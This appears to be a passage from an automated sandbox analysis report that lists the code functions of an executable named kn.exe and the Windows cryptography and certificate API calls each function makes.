Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F7CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,9_2_00007FF607F7CB98
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF60801CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,9_2_00007FF60801CBB4
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608020B9C CryptHashData,GetLastError,#357,9_2_00007FF608020B9C
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF2BC0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608020BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,9_2_00007FF608020BF4
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F8CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,9_2_00007FF607F8CC24
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608026C30 NCryptOpenStorageProvider,#360,9_2_00007FF608026C30
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF0C3C NCryptExportKey,#205,#359,#359,#357,9_2_00007FF607FF0C3C
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F56C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,9_2_00007FF607F56C4C
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608028C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,9_2_00007FF608028C58
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608026C88 NCryptEnumAlgorithms,#360,9_2_00007FF608026C88
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,9_2_00007FF607FF2C80
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608034C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,9_2_00007FF608034C80
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FE4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,9_2_00007FF607FE4CA0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FFACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,9_2_00007FF607FFACAC
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FB4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,9_2_00007FF607FB4CC0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608048CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,9_2_00007FF608048CF4
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608026CE0 NCryptEnumStorageProviders,#360,9_2_00007FF608026CE0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,9_2_00007FF607FF2CFC
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FE2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,9_2_00007FF607FE2CF8
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF0D14 NCryptFinalizeKey,#205,#357,#357,9_2_00007FF607FF0D14
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608026D2C NCryptFreeBuffer,#360,9_2_00007FF608026D2C
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FB2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF607FB2D18
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF0D84 NCryptFreeObject,#205,#357,9_2_00007FF607FF0D84
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF607FF2D78
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608026D78 NCryptOpenKey,#360,9_2_00007FF608026D78
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608022DAC #357,#357,CryptFindOIDInfo,LocalFree,9_2_00007FF608022DAC
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608018DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,9_2_00007FF608018DD0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FF0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,9_2_00007FF607FF0DD4
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608040DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,9_2_00007FF608040DB8
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607FD4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF607FD4DDC
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608026DE0 NCryptCreatePersistedKey,#360,9_2_00007FF608026DE0
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF607F80E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F80E24
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608026E48 NCryptSetProperty,#360,9_2_00007FF608026E48
Source: C:\Users\Public\kn.exe | Code function: 9_2_00007FF608034E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,9_2_00007FF608034E58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,9_2_00007FF607FF2E6C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,9_2_00007FF607FC2E7C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801EE94 CryptSignMessage,SetLastError,9_2_00007FF60801EE94
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F90E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,9_2_00007FF607F90E94
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026EA8 NCryptImportKey,#360,9_2_00007FF608026EA8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608050ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,9_2_00007FF608050ED0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0EF4 NCryptImportKey,#205,#359,#359,#357,9_2_00007FF607FF0EF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026F2C NCryptExportKey,#360,9_2_00007FF608026F2C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F88F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,9_2_00007FF607F88F1C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF607FD4F50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,9_2_00007FF60801EF74
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,9_2_00007FF607FE0F58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F84F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,9_2_00007FF607F84F90
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026FAC BCryptOpenAlgorithmProvider,#360,9_2_00007FF608026FAC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0FB4 NCryptOpenKey,#205,#359,#357,#357,9_2_00007FF607FF0FB4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802700C BCryptEnumAlgorithms,#360,9_2_00007FF60802700C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF7020
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF607FF301C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F67034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,9_2_00007FF607F67034
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,9_2_00007FF607F6302F
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,9_2_00007FF607FE9028
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF1058 NCryptOpenStorageProvider,#205,#359,#357,9_2_00007FF607FF1058
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802705C BCryptGetProperty,#360,9_2_00007FF60802705C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,9_2_00007FF607F9107C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FFB0A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,9_2_00007FF607FBB098
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080270C8 BCryptSetProperty,#360,9_2_00007FF6080270C8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF10D8 NCryptSetProperty,#205,#359,#357,#359,#357,9_2_00007FF607FF10D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF607FF30D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FA9134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,9_2_00007FF607FA9134
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,9_2_00007FF60801511C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608027124 BCryptGenerateKeyPair,#360,9_2_00007FF608027124
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805613C CryptDecodeObjectEx,9_2_00007FF60805613C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,9_2_00007FF607FB417C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF607FD6194
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F921A4 #360,#359,#357,#357,BCryptFreeBuffer,9_2_00007FF607F921A4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080161AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,9_2_00007FF6080161AC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,9_2_00007FF607FDA1E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608056214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,9_2_00007FF608056214
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,9_2_00007FF607FEE1F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,9_2_00007FF60802A1F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF60801E274
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607FC6280
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608012278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,9_2_00007FF608012278
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608028298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,9_2_00007FF608028298
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,9_2_00007FF60805A2E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F90300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,9_2_00007FF607F90300
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,9_2_00007FF607FE2358
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,9_2_00007FF607FE6374
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7E3B0 #357,#357,CryptDecodeObject,LocalFree,9_2_00007FF607F7E3B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F923E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,9_2_00007FF607F923E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608028404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF608028404
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F74410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F74410
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,9_2_00007FF607FCA450
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,9_2_00007FF607FCC450
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,9_2_00007FF607FE8488
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,9_2_00007FF607FC24D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F644E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F644E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,9_2_00007FF607F7C514
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF60801E516
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,9_2_00007FF60805A58C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF60802A590
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FEE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,9_2_00007FF607FEE57C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF65B4 NCryptIsKeyHandle,_CxxThrowException,9_2_00007FF607FF65B4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,9_2_00007FF607F7C5D4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,9_2_00007FF607FB25E8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F78600 #357,CryptDecodeObject,GetLastError,LocalFree,9_2_00007FF607F78600
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F80630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F80630
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608026654 NCryptGetProperty,#360,9_2_00007FF608026654
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBA654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,9_2_00007FF607FBA654
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FC4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,9_2_00007FF607FC4694
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F86694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,9_2_00007FF607F86694
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F926E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,9_2_00007FF607F926E0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080266D8 NCryptFreeObject,#360,9_2_00007FF6080266D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080186D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,9_2_00007FF6080186D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE2724 CryptDecodeObject,GetLastError,#357,9_2_00007FF607FE2724
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0740 BCryptCloseAlgorithmProvider,#205,#357,#357,9_2_00007FF607FF0740
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,9_2_00007FF60802A740
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF07A4 BCryptDestroyHash,#205,#357,9_2_00007FF607FF07A4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607FE27BC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F567CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F567CC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080007D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,9_2_00007FF6080007D0
